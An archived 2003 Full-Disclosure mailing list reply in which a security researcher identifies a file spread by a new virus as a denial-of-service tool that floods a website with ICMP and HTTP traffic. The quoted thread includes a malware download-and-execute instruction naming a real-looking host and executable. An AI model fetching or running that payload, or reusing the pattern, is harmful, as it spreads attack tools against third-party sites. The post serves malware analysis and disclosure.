Full Disclosure mailing list archives

Re: New virus

From: Joe Stewart <jstewart () lurhq com>
Date: Wed, 26 Nov 2003 08:52:46 -0500

On Tuesday 25 November 2003 5:17 pm, Steven Harrison wrote:

Just for fun, I pointed my web browser at
http://finance.red-host.com/events.php and all I got back was:

exec:http://wendy35.phpwebhosting.com/netm.exe

I retrieved that file, and running it 'strings' does imply that it
will contact a remote website. It could be a copy of the virus (I
have yet to recieve one yet), giving it another way to distribute
itself, or for the author to distribute improved versions.


It's a DoS attack tool, the target of which is the website you see in 
the strings output. Its only function is to flood the remote host with 
ICMP and HTTP traffic.

-Joe

--
Joe Stewart, GCIH 
Senior Security Researcher
LURHQ http://www.lurhq.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

New virus Andrew Thomas (Nov 25)
- Re: New virus Alain Fauconnet (Nov 25)
- <Possible follow-ups>
- New virus Andrew Thomas (Nov 25)
  - Re: New virus Lorenzo Hernandez Garcia-Hierro (Nov 25)
    - Re: New virus Steven Harrison (Nov 25)
    - Re: New virus Joe Stewart (Nov 26)
  - RE: New virus Kristian Hermansen (Nov 25)